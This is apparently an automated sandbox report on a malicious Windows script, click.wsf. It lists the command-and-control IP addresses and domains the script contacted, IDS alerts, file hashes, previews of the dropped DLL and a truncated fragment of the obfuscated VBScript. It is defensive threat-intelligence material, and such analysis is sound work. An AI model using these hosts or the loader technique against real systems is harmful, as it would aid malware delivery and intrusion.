        		bbvoyage.comRussian Federation
        		197695AS-REGRUtrue
        186.202.153.5
        		gomespontes.com.brBrazil
        		27715LocawebServicosdeInternetSABRtrue
        203.26.41.131
        		penshorn.orgAustralia
        		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
        107.170.39.149
        		unknownUnited States
        		14061DIGITALOCEAN-ASNUStrue
        66.228.32.31
        		unknownUnited States
        		63949LINODE-APLinodeLLCUStrue
        197.242.150.244
        		unknownSouth Africa
        		37611AfrihostZAtrue
        185.4.135.165
        		unknownGreece
        		199246TOPHOSTGRtrue
        183.111.227.137
        		unknownKorea Republic of
        		4766KIXS-AS-KRKoreaTelecomKRtrue
        45.176.232.124
        		unknownColombia
        		267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
        169.57.156.166
        		unknownUnited States
        		36351SOFTLAYERUStrue
        164.68.99.3
        		unknownGermany
        		51167CONTABODEtrue
        139.59.126.41
        		unknownSingapore
        		14061DIGITALOCEAN-ASNUStrue
        167.172.253.162
        		unknownUnited States
        		14061DIGITALOCEAN-ASNUStrue
        167.172.199.165
        		unknownUnited States
        		14061DIGITALOCEAN-ASNUStrue
        202.129.205.3
        		unknownThailand
        		45328NIPA-AS-THNIPATECHNOLOGYCOLTDTHtrue
        147.139.166.154
        		unknownUnited States
        		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
        153.92.5.27
        		unknownGermany
        		47583AS-HOSTINGERLTtrue
        159.65.88.10
        		unknownUnited States
        		14061DIGITALOCEAN-ASNUStrue
        172.105.226.75
        		unknownUnited States
        		63949LINODE-APLinodeLLCUStrue
        164.90.222.65
        		unknownUnited States
        		14061DIGITALOCEAN-ASNUStrue
        213.239.212.5
        		unknownGermany
        		24940HETZNER-ASDEtrue
        5.135.159.50
        		unknownFrance
        		16276OVHFRtrue
        186.194.240.217
        		unknownBrazil
        		262733NetceteraTelecomunicacoesLtdaBRtrue
        119.59.103.152
        		unknownThailand
        		56067METRABYTE-TH453LadplacoutJorakhaebuaTHtrue
        159.89.202.34
        		unknownUnited States
        		14061DIGITALOCEAN-ASNUStrue
        91.121.146.47
        		unknownFrance
        		16276OVHFRtrue
        160.16.142.56
        		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
        201.94.166.162
        		unknownBrazil
        		28573CLAROSABRtrue
        91.207.28.33
        		unknownKyrgyzstan
        		39819PROHOSTKGtrue
        103.75.201.2
        		unknownThailand
        		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
        103.43.75.120
        		unknownJapan20473AS-CHOOPAUStrue
        188.44.20.25
        		unknownMacedonia
        		57374GIV-ASMKtrue
        45.235.8.30
        		unknownBrazil
        		267405WIKINETTELECOMUNICACOESBRtrue
        153.126.146.25
        		unknownJapan7684SAKURA-ASAKURAInternetIncJPtrue
        72.15.201.15
        		unknownUnited States
        		13649ASN-VINSUStrue
        187.63.160.88
        		unknownBrazil
        		28169BITCOMPROVEDORDESERVICOSDEINTERNETLTDABRtrue
        82.223.21.224
        		unknownSpain
        		8560ONEANDONE-ASBrauerstrasse48DEtrue
        173.212.193.249
        		unknownGermany
        		51167CONTABODEtrue
        95.217.221.146
        		unknownGermany
        		24940HETZNER-ASDEtrue
        149.56.131.28
        		unknownCanada
        		16276OVHFRtrue
        182.162.143.56
        		unknownKorea Republic of
        		3786LGDACOMLGDACOMCorporationKRtrue
        1.234.2.232
        		unknownKorea Republic of
        		9318SKB-ASSKBroadbandCoLtdKRtrue
        192.229.221.95
        		unknownUnited States
        		15133EDGECASTUSfalse
        129.232.188.93
        		unknownSouth Africa
        		37153xneeloZAtrue
        52.109.76.141
        		unknownUnited States
        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
        94.23.45.86
        		unknownFrance
        		16276OVHFRtrue

        General Information

        Joe Sandbox Version:37.0.0 Beryl
        Analysis ID:830321
        Start date and time:2023-03-20 09:06:00 +01:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 5m 52s
        Hypervisor based Inspection enabled:false
        Report type:light
        Cookbook file name:defaultwindowsinteractivecookbook.jbs
        Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
        Number of analysed new started processes analysed:6
        Number of new started drivers analysed:0
        Number of existing processes analysed:1
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample file name:click.wsf
        Detection:MAL
        Classification:mal100.troj.evad.winWSF@5/8@3/54
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 50.2% (good quality ratio 42.4%)
        • Quality average: 60.5%
        • Quality standard deviation: 35.6%
        HCA Information:
        • Successful, ratio: 80%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .wsf

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
        • TCP Packets have been reduced to 100
        • Excluded IPs from analysis (whitelisted): 93.184.221.240, 8.253.95.121, 8.241.121.126, 8.241.123.126, 8.248.135.254, 67.27.234.126
        • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, login.live.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        09:06:48API Interceptor2x Sleep call for process: wscript.exe modified
        09:07:20API Interceptor8x Sleep call for process: regsvr32.exe modified

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASNs

        No context

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

        Download File
        Process:C:\Windows\System32\regsvr32.exe
        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 62582 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
        Category:dropped
        Size (bytes):62582
        Entropy (8bit):7.996063107774368
        Encrypted:true
        SSDEEP:1536:Jk3XPi43VgGp0gB2itudTSRAn/TWTdWftu:CHa43V5p022iZ4CgA
        MD5:E71C8443AE0BC2E282C73FAEAD0A6DD3
        SHA1:0C110C1B01E68EDFACAEAE64781A37B1995FA94B
        SHA-256:95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
        SHA-512:B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview:MSCF....v.......,...................I.................BVrl .authroot.stl....oJ5..CK..8U....a..3.1.P. J.".t..2F2e.dHH......$E.KB.2D..-SJE....^..'..y.}..,{m.....\...]4.G.......h....148...e.gr.....48:.L...g.....Xef.x:..t...J...6-....kW6Z>....&......ye.U.Q&z:.vZ..._....a...]..T.E.....B.h.,...[....V.O.3..EW.x.?.Q..$.@.W..=.B.f..8a.Y.JK..g./%p..C.4CD.s..Jd.u..@.g=...a.. .h%..'.xjy7.E..\.....A..':.4TdW?Ko3$.Hg.z.d~....../q..C.....`...A[ W(.........9...GZ.;....l&?........F...p?... .p.....{S.L4..v.+...7.T?.....p..`..&..9.......f...0+.L.....1.2b)..vX5L'.~....2vz.,E.Ni.{#...o..w.?.#.3..h.v<.S%.].tD@!Le.w.q.7.8....QW.FT.....hE.........Y............./.%Q...k...*.Y.n..v.A..../...>B..5\..-Ko.......O<.b.K.{.O.b...._.7...4.;%9N..K.X>......kg-9..r.c.g.G|.*[.-...HT...",?.q...ad....7RE.......!f..#../....?.-.^.K.c^...+{.g......]<..$.=.O....ii7.wJ+S..Z..d.....>..J*...T..Q7..`.r,<$....\d:K`..T.n....N.....C..j.;.1SX..j....1...R....+....Yg....]....3..9..S..D..`.

        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

        Download File
        Process:C:\Windows\System32\regsvr32.exe
        File Type:data
        Category:modified
        Size (bytes):328
        Entropy (8bit):3.127437612314223
        Encrypted:false
        SSDEEP:6:kKnMAry/7UN+SkQlPlEGYRMY9z+4KlDA3RUecZUt:PMoCvkPlE99SNxAhUext
        MD5:DB2EC1D25EBBF63A67B76A991DE9381B
        SHA1:ED66F35D9308016B4F276CC09C3B2116669070E5
        SHA-256:E7E343FE929301E443F44F2842348A4875C87ABD0CF3B2F29403C96A660344AA
        SHA-512:03D7D4AE006B25E50EA4F98ADD852997D7E11A6064AE0334A2BA0D0056E15F5C432990EDC79FA4C00F57A0A44C71982DC302636E17F46A95CAE85814AF7400FC
        Malicious:false
        Preview:p...... ........Z.L..[..(....................................................... ..........).K......&...........v...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.2.f.9.2.9.a.7.4.b.d.9.1.:.0."...

        C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_13929_20386-20230320T0906180748-804.etl

        Download File
        Process:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
        File Type:old-fs dump file (16-bit, assuming PDP-11 endianness), Previous dump Thu Jan 1 01:07:36 1970, This dump Thu Jan 1 01:09:04 1970,
        Category:modified
        Size (bytes):8192
        Entropy (8bit):4.3056677894243895
        Encrypted:false
        SSDEEP:48:oG+4F4x8t4OU4oxJN4rXVJVpV+VuVSV1y8wfZu+E+d2nYgFxvZPEGsj6xYw6vMI:TU8c9dK2nrFrTCMI
        MD5:8A4B17DA69383C75316D7488A1F36DEB
        SHA1:04AA89B2ECD1EA38D81AD9865450CF02F9A709C5
        SHA-256:882EE2DE3174D9BA48B2B58B5ACEA99F69EB8D5594F7ED2DD5C6C7FA47B71B2A
        SHA-512:E397B0E0D7701583A8E2CCD097E78A881C826B7DC0696595107657DEDEF826FAED3D522C80605ED83B7119081667DA58730A65BFE6828C25BF7E02404AD8A654
        Malicious:false
        Preview:........0........_k..[..&........................... ...h.1.<...8 .~<...X...........$.....?..[..#..*...C.L...0T.j...................B.........................[.X...........$.....?..[..#..*...C.L...0T.j...............[...B.........................f.`...........$.....?..[..#..*...C.L...0T.i................&..B...............................................$.....?..[..0.K(.J.J.C...............@....... ..B.......................M.i.c.r.o.s.o.f.t...O.f.f.i.c.e...O.u.t.l.o.o.k...C.l.o.u.d.S.e.t.t.i.n.g.s...D.e.f.a.u.l.t.E.n.a.b.l.e.d.S.t.a.t.u.s...].......0.0.............$.....?..[..0.K(.J.J.C...............@........1.B.......................M.i.c.r.o.s.o.f.t...O.f.f.i.c.e...O.u.t.l.o.o.k...R.i.p.C.o.r.d...4.7.2.6.4.2.8...........0.P...........$....HF..[....{(.Z/K.i.a..ZIs.................9.B...................P...........$....HF..[....{(.Z/K.i.a..ZIt.................F.B...................P...........$....HF..[....{(.Z/K.i.a..ZIs.................M.B...................P...........$....HF..[..

        C:\Users\user\Desktop\click.wsf

        Download File
        Process:C:\Windows\System32\wscript.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):9
        Entropy (8bit):2.94770277922009
        Encrypted:false
        SSDEEP:3:tWn:tWn
        MD5:07F5A0CFFD9B2616EA44FB90CCC04480
        SHA1:641B12C5FFA1A31BC367390E34D441A9CE1958EE
        SHA-256:A0430A038E7D879375C9CA5BF94CB440A3B9A002712118A7BCCC1FF82F1EA896
        SHA-512:09E7488C138DEAD45343A79AD0CB37036C5444606CDFD8AA859EE70227A96964376A17F07E03D0FC353708CA9AAF979ABF8BC917E6C2D005A0052575E074F531
        Malicious:true
        Preview:badum tss

        C:\Users\user\Desktop\rad1F9A4.tmp.dll

        Download File
        Process:C:\Windows\System32\wscript.exe
        File Type:HTML document, ASCII text
        Category:dropped
        Size (bytes):381
        Entropy (8bit):5.035593451835013
        Encrypted:false
        SSDEEP:6:pn0+Dy9xwq8B0hEr6VHB0SpMAcg/EzBoAuZ2A3b1AYDAJgXPUhA1QCV2AmWZW5Kk:J0+oxb8ShRZSS146Ai2A3JAhSPEAr1mP
        MD5:118A489422BE0C5CA0CECF3BB7903C7E
        SHA1:B90AF089FD0E728E61D532BE80062AED39D98978
        SHA-256:FF6D14F77E27F7B90CB2F20BCE408189F5F388961F3FCD13FE2DF2CC0A002DC3
        SHA-512:283CD22F52BCCB8DD22A8772E8121302A6975F2DE35540122F1F7B38953F0BB015831999733884686C1A9019034D2CC113F81245F53B84EDD02B8ADB94638D40
        Malicious:true
        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>401 Unauthorized</title>.</head><body>.<h1>Unauthorized</h1>.<p>This server could not verify that you.are authorized to access the document.requested. Either you supplied the wrong.credentials (e.g., bad password), or your.browser doesn't understand how to supply.the credentials required.</p>.</body></html>.

        C:\Users\user\Desktop\rad75349.tmp.dll

        Download File
        Process:C:\Windows\System32\wscript.exe
        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
        Category:dropped
        Size (bytes):316928
        Entropy (8bit):7.337848702590508
        Encrypted:false
        SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
        MD5:BFC060937DC90B273ECCB6825145F298
        SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
        SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
        SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
        Malicious:true
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 79%
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................

        C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

        Download File
        Process:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
        File Type:data
        Category:dropped
        Size (bytes):5139
        Entropy (8bit):1.8507519303077096
        Encrypted:false
        SSDEEP:24:Wc/c7JJJPfffffH/jCzDPLAh9ECN/+mMcoqqxGU5nuIIHq+NX9:YNfffffHOriv8xmIID9
        MD5:93EDBC6244E8383ED60A93DF93EA281C
        SHA1:0BB0BC49B90C8D15BDD689A740966BF9610A6F1F
        SHA-256:E32D3D4439E07830ADC99B5660C3195D6DE0CFDC10310711D137842D3B6EDA2D
        SHA-512:4DCDFD96F36EB44C639A82202E2BAD9D254EEBF943C3308078BCC7DFD05AAEC2522C28D26730C87E76849BAD2C98CD8E2BDC85B952682C22429D26904C5B0FE9
        Malicious:false
        Preview:.................F.............................................................."...............\.......................@................f...........................................................................................................................................................................................................................................................................................................................................................................h........\.......@...........s...`........$......b.......f........I...... ................y......r.......`...............D...s...d.......................p...................s...|...................s...|...................s...|...................s...|...................s...|...................s...................................................................................................................................................<........<......n...s...D.......@S..........s...........

        C:\Windows\System32\BlUwZJEPejvMeG\xhwdmo.dll (copy)

        Download File
        Process:C:\Windows\System32\regsvr32.exe
        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
        Category:dropped
        Size (bytes):316928
        Entropy (8bit):7.337848702590508
        Encrypted:false
        SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
        MD5:BFC060937DC90B273ECCB6825145F298
        SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
        SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
        SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
        Malicious:true
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 79%
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................

        Static File Info

        General

        File type:HTML document, ASCII text, with very long lines (792), with CRLF line terminators
        Entropy (8bit):5.21695797640856
        TrID:
          File name:click.wsf
          File size:55114
          MD5:016fa961b9af49d75b597c2f61ab344c
          SHA1:2fee0634cfa2988ee8f000724efc1c6c18beef23
          SHA256:8343af0017ad64499072d1485302948a7ad744a638bd2deab301ae108b6b18fd
          SHA512:4b58acb7111c383b0512352d86a3564d0a5167559d402d330ff7167a6e0ae2cf464096bba3a0936a566e3c2a9b0ffc4d448322c86658ed449e14fb46ad8fbdb8
          SSDEEP:768:w9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:QTVdaeNtuXndH
          TLSH:313362F0AC025C0AE123D977B1BB561359C052FD42683B26FC6D507AE678E3096DD8EB
          File Content Preview:<job id="1cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyext

          File Icon

          Icon Hash:e8d69ece869a9ec4

          Network Behavior

          Snort IDS Alerts

          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
          192.168.2.3187.63.160.8849735802404314 03/20/23-09:07:57.133517TCP2404314ET CNC Feodo Tracker Reported CnC Server TCP group 84973580192.168.2.3187.63.160.88
          192.168.2.3182.162.143.56497344432404312 03/20/23-09:07:41.132019TCP2404312ET CNC Feodo Tracker Reported CnC Server TCP group 749734443192.168.2.3182.162.143.56
          192.168.2.3104.168.155.1434973880802404302 03/20/23-09:08:15.086032TCP2404302ET CNC Feodo Tracker Reported CnC Server TCP group 2497388080192.168.2.3104.168.155.143
          192.168.2.391.121.146.474973180802404344 03/20/23-09:07:19.650620TCP2404344ET CNC Feodo Tracker Reported CnC Server TCP group 23497318080192.168.2.391.121.146.47
          192.168.2.3164.90.222.65497374432404308 03/20/23-09:08:10.886539TCP2404308ET CNC Feodo Tracker Reported CnC Server TCP group 549737443192.168.2.3164.90.222.65
          192.168.2.3167.172.199.1654973680802404310 03/20/23-09:08:05.635641TCP2404310ET CNC Feodo Tracker Reported CnC Server TCP group 6497368080192.168.2.3167.172.199.165
          192.168.2.366.228.32.314973370802404330 03/20/23-09:07:25.133944TCP2404330ET CNC Feodo Tracker Reported CnC Server TCP group 16497337080192.168.2.366.228.32.31

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Mar 20, 2023 09:06:37.277081966 CET49727443192.168.2.3203.26.41.131
          Mar 20, 2023 09:06:37.277157068 CET44349727203.26.41.131192.168.2.3
          Mar 20, 2023 09:06:37.277278900 CET49727443192.168.2.3203.26.41.131
          Mar 20, 2023 09:06:37.281250954 CET49727443192.168.2.3203.26.41.131
          Mar 20, 2023 09:06:37.281287909 CET44349727203.26.41.131192.168.2.3
          Mar 20, 2023 09:06:37.856724977 CET44349727203.26.41.131192.168.2.3
          Mar 20, 2023 09:06:37.856918097 CET49727443192.168.2.3203.26.41.131
          Mar 20, 2023 09:06:37.862493992 CET49727443192.168.2.3203.26.41.131
          Mar 20, 2023 09:06:37.862519979 CET44349727203.26.41.131192.168.2.3
          Mar 20, 2023 09:06:37.862912893 CET44349727203.26.41.131192.168.2.3
          Mar 20, 2023 09:06:37.902910948 CET49727443192.168.2.3203.26.41.131
          Mar 20, 2023 09:06:38.086049080 CET49727443192.168.2.3203.26.41.131
          Mar 20, 2023 09:06:38.086101055 CET44349727203.26.41.131192.168.2.3
          Mar 20, 2023 09:06:38.453761101 CET44349727203.26.41.131192.168.2.3
          Mar 20, 2023 09:06:38.453893900 CET44349727203.26.41.131192.168.2.3
          Mar 20, 2023 09:06:38.454015970 CET49727443192.168.2.3203.26.41.131
          Mar 20, 2023 09:06:38.454215050 CET49727443192.168.2.3203.26.41.131
          Mar 20, 2023 09:06:38.454250097 CET44349727203.26.41.131192.168.2.3
          Mar 20, 2023 09:06:38.756974936 CET49728443192.168.2.331.31.196.172
          Mar 20, 2023 09:06:38.757046938 CET4434972831.31.196.172192.168.2.3
          Mar 20, 2023 09:06:38.757178068 CET49728443192.168.2.331.31.196.172
          Mar 20, 2023 09:06:38.758169889 CET49728443192.168.2.331.31.196.172
          Mar 20, 2023 09:06:38.758207083 CET4434972831.31.196.172192.168.2.3
          Mar 20, 2023 09:06:38.898732901 CET4434972831.31.196.172192.168.2.3
          Mar 20, 2023 09:06:38.898938894 CET49728443192.168.2.331.31.196.172
          Mar 20, 2023 09:06:38.901292086 CET49728443192.168.2.331.31.196.172
          Mar 20, 2023 09:06:38.901318073 CET4434972831.31.196.172192.168.2.3
          Mar 20, 2023 09:06:38.901609898 CET4434972831.31.196.172192.168.2.3
          Mar 20, 2023 09:06:38.902482033 CET49728443192.168.2.331.31.196.172
          Mar 20, 2023 09:06:38.902502060 CET4434972831.31.196.172192.168.2.3
          Mar 20, 2023 09:06:39.005121946 CET4434972831.31.196.172192.168.2.3
          Mar 20, 2023 09:06:39.005261898 CET4434972831.31.196.172192.168.2.3
          Mar 20, 2023 09:06:39.005364895 CET49728443192.168.2.331.31.196.172
          Mar 20, 2023 09:06:39.007162094 CET49728443192.168.2.331.31.196.172
          Mar 20, 2023 09:06:39.007194042 CET4434972831.31.196.172192.168.2.3
          Mar 20, 2023 09:06:39.007216930 CET49728443192.168.2.331.31.196.172
          Mar 20, 2023 09:06:39.007227898 CET4434972831.31.196.172192.168.2.3
          Mar 20, 2023 09:06:39.700891018 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:39.700946093 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:39.701098919 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:39.711879969 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:39.711910009 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:40.441551924 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:40.441704988 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:40.444323063 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:40.444350958 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:40.444715023 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:40.445736885 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:40.445763111 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:40.871501923 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:40.871726036 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:40.871889114 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:40.871921062 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:40.921637058 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.103441954 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.103568077 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.103580952 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.103604078 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.103643894 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.103651047 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.103668928 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.103671074 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.103719950 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.103815079 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.103898048 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.335499048 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.335558891 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.335699081 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.335710049 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.335740089 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.335784912 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.335819006 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.335894108 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.336009026 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.336385965 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.336483002 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.336533070 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.336610079 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.336978912 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.337086916 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.567697048 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.567724943 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.567856073 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.567913055 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.567944050 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.568010092 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.568078041 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.568078995 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.568108082 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.568233967 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.568310022 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.568434954 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.568497896 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.568624020 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.568809986 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.568912029 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.569062948 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.569207907 CET49729443192.168.2.3186.202.153.5
          Mar 20, 2023 09:06:41.569339991 CET44349729186.202.153.5192.168.2.3
          Mar 20, 2023 09:06:41.569442987 CET49729443192.168.2.3186.202.153.5

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Mar 20, 2023 09:06:36.428728104 CET6000853192.168.2.31.1.1.1
          Mar 20, 2023 09:06:37.266818047 CET53600081.1.1.1192.168.2.3
          Mar 20, 2023 09:06:38.496239901 CET5371053192.168.2.31.1.1.1
          Mar 20, 2023 09:06:38.754851103 CET53537101.1.1.1192.168.2.3
          Mar 20, 2023 09:06:39.017168045 CET5510353192.168.2.31.1.1.1
          Mar 20, 2023 09:06:39.699096918 CET53551031.1.1.1192.168.2.3

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Mar 20, 2023 09:06:36.428728104 CET192.168.2.31.1.1.10x4e7eStandard query (0)penshorn.orgA (IP address)IN (0x0001)false
          Mar 20, 2023 09:06:38.496239901 CET192.168.2.31.1.1.10x4d17Standard query (0)bbvoyage.comA (IP address)IN (0x0001)false
          Mar 20, 2023 09:06:39.017168045 CET192.168.2.31.1.1.10x8dc3Standard query (0)www.gomespontes.com.brA (IP address)IN (0x0001)false

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Mar 20, 2023 09:06:37.266818047 CET1.1.1.1192.168.2.30x4e7eNo error (0)penshorn.org203.26.41.131A (IP address)IN (0x0001)false
